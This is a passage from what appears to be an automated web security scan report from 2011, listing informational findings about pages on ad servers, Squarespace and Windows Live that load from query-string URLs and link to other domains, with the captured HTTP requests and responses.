http://pagead2.googlesyndication.com/pagead/js/r20110713/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.treehugger.com/science_technology/%253Fcampaign%253Dth_nav_scitech%26hl%3Den%26client%3Dca-discovery-green_js%26adU%3DSunRunHome.com%26adT%3DImageAd%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNHrx4rgoFCxo50U9gNHxVwopi5D4Q

Request

GET /pagead/ads?client=ca-discovery-green_js&format=120x600_as&output=html&h=600&w=120&lmt=1311446613&channel=TreeHugger_Domain&ad_type=text_image&color_bg=f0f0f0&color_border=f0f0f0&color_link=4E5D76&color_text=000000&color_url=4E5D76&flash=10.3.181&url=http%3A%2F%2Fwww.treehugger.com%2Fscience_technology%2F%3Fcampaign%3Dth_nav_scitech&dt=1311428613242&bpp=2&shv=r20110713&jsv=r20110627&prev_fmts=120x90_0ads_al_s&correlator=1311428613403&pv_ch=TreeHugger_Domain%2B&frm=4&adk=2317484887&ga_vid=1241005680.1311427153&ga_sid=1311427153&ga_hid=521257110&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=932&bih=829&ref=http%3A%2F%2Fwww.treehugger.com%2Ftravel_nature%2F%3Fcampaign%3Dth_nav_travel&fu=0&ifi=2&dtd=784&xpc=sm8TDhnWhF&p=http%3A//www.treehugger.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2; id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 23 Jul 2011 13:43:27 GMT
Server: cafe
Cache-Control: private
Content-Length: 3214
X-XSS-Protection: 1; mode=block

<html><head><style></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.treehugger.com/science_technology/%253Fcampaign%253Dth_nav_scitech%26hl%3Den%26client%3Dca-discovery-green_js%26adU%3DSunRunHome.com%26adT%3DImageAd%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNHrx4rgoFCxo50U9gNHxVwopi5D4Q" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110713/r20110719/abg.js"></script><iframe style="display:none" src="http://p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html"></iframe>
...[SNIP]...

18.76. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-discovery-green_js&format=120x600_as&output=html&h=600&w=120&lmt=1311445172&channel=TreeHugger_Domain&ad_type=text_image&color_bg=f0f0f0&color_border=f0f0f0&color_link=4E5D76&color_text=000000&color_url=4E5D76&flash=10.3.181&url=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&dt=1311427152735&bpp=2&shv=r20110713&jsv=r20110627&prev_fmts=120x90_0ads_al_s%2C120x600_as&correlator=1311427153558&pv_ch=TreeHugger_Domain%2B&frm=4&adk=2317484887&ga_vid=1241005680.1311427153&ga_sid=1311427153&ga_hid=891508824&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=932&bih=829&fu=0&ifi=3&dtd=M&xpc=LOfXt4Kfwi&p=http%3A//www.treehugger.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110713/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php%26hl%3Den%26client%3Dca-discovery-green_js%26adU%3Dautos.yahoo.com%26adT%3DImageAd%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNHKUNM2BOo3hBUcY4-sUU0FQk1p8g

Request

GET /pagead/ads?client=ca-discovery-green_js&format=120x600_as&output=html&h=600&w=120&lmt=1311445172&channel=TreeHugger_Domain&ad_type=text_image&color_bg=f0f0f0&color_border=f0f0f0&color_link=4E5D76&color_text=000000&color_url=4E5D76&flash=10.3.181&url=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&dt=1311427152735&bpp=2&shv=r20110713&jsv=r20110627&prev_fmts=120x90_0ads_al_s%2C120x600_as&correlator=1311427153558&pv_ch=TreeHugger_Domain%2B&frm=4&adk=2317484887&ga_vid=1241005680.1311427153&ga_sid=1311427153&ga_hid=891508824&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=932&bih=829&fu=0&ifi=3&dtd=M&xpc=LOfXt4Kfwi&p=http%3A//www.treehugger.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2; id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 23 Jul 2011 13:19:27 GMT
Server: cafe
Cache-Control: private
Content-Length: 2983
X-XSS-Protection: 1; mode=block

<html><head><style></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php%26hl%3Den%26client%3Dca-discovery-green_js%26adU%3Dautos.yahoo.com%26adT%3DImageAd%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNHKUNM2BOo3hBUcY4-sUU0FQk1p8g" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110713/r20110719/abg.js"></script>
...[SNIP]...

18.77. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7268992780839433&output=html&h=600&slotname=0018455936&w=160&ea=0&flash=0&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FHow_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&dt=1311276184871&bpp=26&shv=r20110713&jsv=r20110719&correlator=1311276187095&frm=7&adk=399869954&ga_vid=274049985.1311276131&ga_sid=1311276131&ga_hid=171534027&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=1023&bih=706&ifk=1021502957&eid=36815002&fu=4&ifi=1&dtd=4848

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%253Futm_source%253Doutbrain%2526utm_medium%253Dcpc%2526utm_campaign%253DADHD_Adult%26hl%3Den%26client%3Dca-pub-7268992780839433%26adU%3DTheTotalTransformation.com%26adT%3DFix%2BBad%2BADHD%2BBehavior%26adU%3Dwww.lumosity.com%26adT%3DBrain%2BTest%25E2%2584%25A2%26adU%3Dwww.comfortkeepers.com%26adT%3DComfort%2BKeepers%2BHome%2BCare%26adU%3DAdhd.OneHealthyLifestyle.com%26adT%3DAdhd%2BSupplements%26adU%3DHaveTheRelationshipYouWant.com%26adT%3DMake%2BHim%2BAddicted%2BTo%2BYou%26gl%3DUS&usg=AFQjCNHv9wBoXlh6tR62byFlOmSbfPX7PQ

Request

GET /pagead/ads?client=ca-pub-7268992780839433&output=html&h=600&slotname=0018455936&w=160&ea=0&flash=0&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FHow_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&dt=1311276184871&bpp=26&shv=r20110713&jsv=r20110719&correlator=1311276187095&frm=7&adk=399869954&ga_vid=274049985.1311276131&ga_sid=1311276131&ga_hid=171534027&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=1023&bih=706&ifk=1021502957&eid=36815002&fu=4&ifi=1&dtd=4848 HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=2;sz=160x600;ord=101352252258050
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Jul 2011 19:23:05 GMT
Server: cafe
Cache-Control: private
Content-Length: 15083
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#6699cc}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%253Futm_source%253Doutbrain%2526utm_medium%253Dcpc%2526utm_campaign%253DADHD_Adult%26hl%3Den%26client%3Dca-pub-7268992780839433%26adU%3DTheTotalTransformation.com%26adT%3DFix%2BBad%2BADHD%2BBehavior%26adU%3Dwww.lumosity.com%26adT%3DBrain%2BTest%25E2%2584%25A2%26adU%3Dwww.comfortkeepers.com%26adT%3DComfort%2BKeepers%2BHome%2BCare%26adU%3DAdhd.OneHealthyLifestyle.com%26adT%3DAdhd%2BSupplements%26adU%3DHaveTheRelationshipYouWant.com%26adT%3DMake%2BHim%2BAddicted%2BTo%2BYou%26gl%3DUS&usg=AFQjCNHv9wBoXlh6tR62byFlOmSbfPX7PQ" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.78. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7268992780839433&output=html&h=600&slotname=0018455936&w=160&ea=0&flash=0&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FOut_of_Control_It_Could_Be_ADHD.aspx&dt=1311276208517&bpp=25&shv=r20110713&jsv=r20110719&correlator=1311276208605&frm=7&adk=399869954&ga_vid=274049985.1311276131&ga_sid=1311276131&ga_hid=104472600&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=1023&bih=733&ifk=129068866&fu=4&ifi=1&dtd=196

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx%26hl%3Den%26client%3Dca-pub-7268992780839433%26adU%3DSynaptol.com/Adult-ADHD%26adT%3DAdult%2BADHD%2BSymptom%2BRelief%26adU%3DNaturalWellBeing.com/ADD-Treatment%26adT%3DSay%2Bgoodbye%2Bto%2Byour%2BADD%26adU%3DTurnToHelp.com%26adT%3DFind%2BAn%2BAddiction%2BDoctor%26adU%3DTheTotalTransformation.com%26adT%3DFix%2BBad%2BADHD%2BBehavior%26adU%3Dwww.Allsup.com%26adT%3DBipolar%2BDisability%26gl%3DUS&usg=AFQjCNHUWEq7nzBLL9mtMbWS4KqX07CXhg

Request

GET /pagead/ads?client=ca-pub-7268992780839433&output=html&h=600&slotname=0018455936&w=160&ea=0&flash=0&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FOut_of_Control_It_Could_Be_ADHD.aspx&dt=1311276208517&bpp=25&shv=r20110713&jsv=r20110719&correlator=1311276208605&frm=7&adk=399869954&ga_vid=274049985.1311276131&ga_sid=1311276131&ga_hid=104472600&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=1023&bih=733&ifk=129068866&fu=4&ifi=1&dtd=196 HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=2;sz=160x600;ord=716199259245381
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Jul 2011 19:23:25 GMT
Server: cafe
Cache-Control: private
Content-Length: 14339
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#6699cc}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx%26hl%3Den%26client%3Dca-pub-7268992780839433%26adU%3DSynaptol.com/Adult-ADHD%26adT%3DAdult%2BADHD%2BSymptom%2BRelief%26adU%3DNaturalWellBeing.com/ADD-Treatment%26adT%3DSay%2Bgoodbye%2Bto%2Byour%2BADD%26adU%3DTurnToHelp.com%26adT%3DFind%2BAn%2BAddiction%2BDoctor%26adU%3DTheTotalTransformation.com%26adT%3DFix%2BBad%2BADHD%2BBehavior%26adU%3Dwww.Allsup.com%26adT%3DBipolar%2BDisability%26gl%3DUS&usg=AFQjCNHUWEq7nzBLL9mtMbWS4KqX07CXhg" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.79. http://greatponds.squarespace.com/universal/scripts/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://greatponds.squarespace.com
Path:	/universal/scripts/global.js

Issue detail

The page was loaded from a URL containing a query string:

http://greatponds.squarespace.com/universal/scripts/global.js?CE=27

The response contains the following links to other domains:

http://www.apple.com/safari/
http://www.firefox.com/
http://www.microsoft.com/ie/

Request

GET /universal/scripts/global.js?CE=27 HTTP/1.1
Host: greatponds.squarespace.com
Proxy-Connection: keep-alive
Referer: http://greatponds.squarespace.com/get-involved/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=9F024BFCD9D54EAEEB165C54DB57F8E4.web125; ss_lastvisit=1311426661245; WebPersCookie=toq34UxfYnRKkR288w7usH+6wdXqHs9RkEUHAxFtlhFm8gum1EhPPfZKDCvjA+jlkI0fm1YYVXNCBNc=

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=94608000
Pragma: cache
X-ServedBy: web117
ETag: W/"41515-1311285756000"
Last-Modified: Thu, 21 Jul 2011 22:02:36 GMT
Content-Type: text/javascript
Server: SSWS
Content-Length: 41515
Date: Sat, 23 Jul 2011 13:11:09 GMT
X-Varnish: 2960542987 2940607724
Age: 137297
Via: 1.1 varnish
Connection: Keep-Alive
Vary: Accept-Encoding, User-Agent

var D=YAHOO.util.Dom;var E=YAHOO.util.Event;Squarespace=window.Squarespace||{};Squarespace.Interaction={};Squarespace.Constants={POPUPS_DISABLED_MESSAGE:"It appears that you may have a popup blocker e
...[SNIP]...
<br/><a href="http://www.firefox.com/">Click here to download Firefox (Free/Recommended) »</a><br/><a href="http://www.apple.com/safari/">Click here to download Safari (Free) »</a><br/><a href="http://www.microsoft.com/ie/">Click here to download IE7 (Free) »</a>
...[SNIP]...
<br/><a href="http://www.firefox.com/">Click here to download Firefox (Free/Recommended) »</a><br/><a href="http://www.apple.com/safari/">Click here to download Safari (Free) »</a><br/><a href="http://www.microsoft.com/ie/">Click here to download IE7 (Free) »</a>
...[SNIP]...

18.80. http://hipservice.live.com/gethip.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hipservice.live.com
Path:	/gethip.srf

Issue detail

The page was loaded from a URL containing a query string:

http://hipservice.live.com/gethip.srf?id=251248&mkt=en-US&fr=Hard&fid=7cac2e94-9199-4f1d-acee-7c1b198d15e6

The response contains the following link to another domain:

http://img.wlxrs.com/~Live.SiteContent.ID/~16.1.11/~/~/~/~/images/icon_err.gif'+i+'

Request

Response

18.81. http://home.live.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.live.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://home.live.com/search?query=h02332

The response contains the following links to other domains:

http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=wlhome&c5=&c6=&c15=&cv=1.3&cj=1
http://css.wlxrs.com/cAdBg0BF1RU6ts8Co7IhiuCQOC-gu2JSiDTy2H8vEN5PzclNxvppS7NQcdDGWxe-0D3X2-QuAol1pMTeH3a1CQ/Base/16.0.1723/NYKpPzcj59cwuxbasecss.css?ZfDHJ0dwkwrfIMoja3-R7w
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=214291
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.wlxrs.com/oHrsBlc8W6xTfnKtAe79xg/bing.png
http://js.wlxrs.com/4zz1a0sDfk8F0baNdznX2A/Search.js
http://js.wlxrs.com/IW9RMFusiP7aP7lsSm5H9w/wlive.js
http://js.wlxrs.com/MDkCGfAXrMQjb2SY98x7WQ/comscore/beacon.js
http://js.wlxrs.com/MVZ9IMxspbQFL8KYd3mZeg/SearchBox.js
http://js.wlxrs.com/_D/IW9RMFusiP7aP7lsSm5H9w/jquery-min.js
http://msc.wlxrs.com/Zb!TZqMB7AnDRG!PwdG5PQ/js/InvitePopover.js
http://msc.wlxrs.com/sDSzhnAI0HbE94-7UyUFRA/Popover.js
http://secure.wlxrs.com/$live.controls.images/is/invis.gif
http://secure.wlxrs.com/$live.controls.images/m/flag.ico
http://sourceforge.net/projects/hoytllc-vcloud/
http://www.bing.com/search?q=h02332
https://community.vcloudexpress.terremark.com/en-us/discussion_forums/f/59/t/123.aspx
https://community.vcloudexpress.terremark.com/en-us/discussion_forums/f/59/t/96.aspx

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-UA-Compatible: IE=7, IE=9, IE=10
X-AspNet-Version: 4.0.30319
Set-Cookie: xidseq=11; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 23-Jul-2011 03:01:55 GMT; path=/
Set-Cookie: E=P:0B3c+wkXzog=:owBaSuE89cZK/T/ADgs5WcoVfC7zm9cBrz4tVkiAY0I=:F; domain=.live.com; path=/
Set-Cookie: wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJ5MioxLDUxMEE5NzRFQ0I5NEZCMzAsMSwwLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMHwxLDlDOTgzOEU4RTk1OEVGRkUsMSwsMHwxLDY5RjQwMDJDN0I3OTUzQSwxLDAsMA==; domain=live.com; expires=Sat, 30-Jul-2011 04:41:55 GMT; path=/
Set-Cookie: wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJ5MioxLDUxMEE5NzRFQ0I5NEZCMzAsMSwwLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMHwxLDlDOTgzOEU4RTk1OEVGRkUsMSwsMHwxLDY5RjQwMDJDN0I3OTUzQSwxLDAsMA==; domain=live.com; expires=Sat, 30-Jul-2011 04:41:55 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Jul 2011 04:41:54 GMT
Content-Length: 52142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" style="">
<head>
<script t
...[SNIP]...
</script>
<link rel="StyleSheet" href="http://css.wlxrs.com/cAdBg0BF1RU6ts8Co7IhiuCQOC-gu2JSiDTy2H8vEN5PzclNxvppS7NQcdDGWxe-0D3X2-QuAol1pMTeH3a1CQ/Base/16.0.1723/NYKpPzcj59cwuxbasecss.css?ZfDHJ0dwkwrfIMoja3-R7w" type="text/css"/><style id="themecss" type="text/css">
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<link rel="icon" href="http://secure.wlxrs.com/$live.controls.images/m/flag.ico" type="image/x-icon" />

<script type="text/javascript">
...[SNIP]...
<span class="is_c"><img class="is_img" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(http://secure.wlxrs.com/$live.controls.images/h/s7.png);background-position:-0px -8px;width:18px;height:17px;" src="http://secure.wlxrs.com/$live.controls.images/is/invis.gif" alt="Windows Live"/></span>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=h02332">Bing</a>
...[SNIP]...
</span>
<img src="http://img.wlxrs.com/oHrsBlc8W6xTfnKtAe79xg/bing.png" alt="Bing" />
</div>
...[SNIP]...
<span class="is_c"><img class="is_img" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(http://img.wlxrs.com/oHrsBlc8W6xTfnKtAe79xg/mailStrip.png);background-position:-0px -16px;width:10px;height:11px;" src="http://secure.wlxrs.com/$live.controls.images/is/invis.gif" alt="Close"/></span>
...[SNIP]...
<span class="is_c"><img class="is_img" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(http://img.wlxrs.com/oHrsBlc8W6xTfnKtAe79xg/mailStrip.png);background-position:-0px -16px;width:10px;height:11px;" src="http://secure.wlxrs.com/$live.controls.images/is/invis.gif" alt="Close"/></span>
...[SNIP]...
<h3><a href="http://www.bing.com/search?q=h02332">Web results on Bing</a>
...[SNIP]...
<h3><a onclick="$Do.iff('$Search.navEvent', 0, 0, 0);" href="https://community.vcloudexpress.terremark.com/en-us/discussion_forums/f/59/t/96.aspx">Poor CPU Performance - vCloud Express Support - Forums ...</a>
...[SNIP]...
<h3><a onclick="$Do.iff('$Search.navEvent', 0, 0, 1);" href="https://community.vcloudexpress.terremark.com/en-us/discussion_forums/f/59/t/123.aspx">Slow Bandwidth - vCloud Express Support - Forums - vCloudExpress ...</a>
...[SNIP]...
<h3><a onclick="$Do.iff('$Search.navEvent', 0, 0, 2);" href="http://sourceforge.net/projects/hoytllc-vcloud/">Hoyt LLC - RIA for vcloud .8 API | Download Hoyt LLC - RIA for ...</a>
...[SNIP]...
<div class="sr_indented">
<a href="http://www.bing.com/search?q=h02332">View more on Bing</a>
...[SNIP]...
<li><a id="uxp_ftr_link_legal" target="_top" href="http://g.msn.com/0TO_/enus">Terms</a></li>
<li><a id="uxp_ftr_link_privacy" target="_top" href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a></li><li><a id="uxp_ftr_link_aboutads" target="_top" href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...
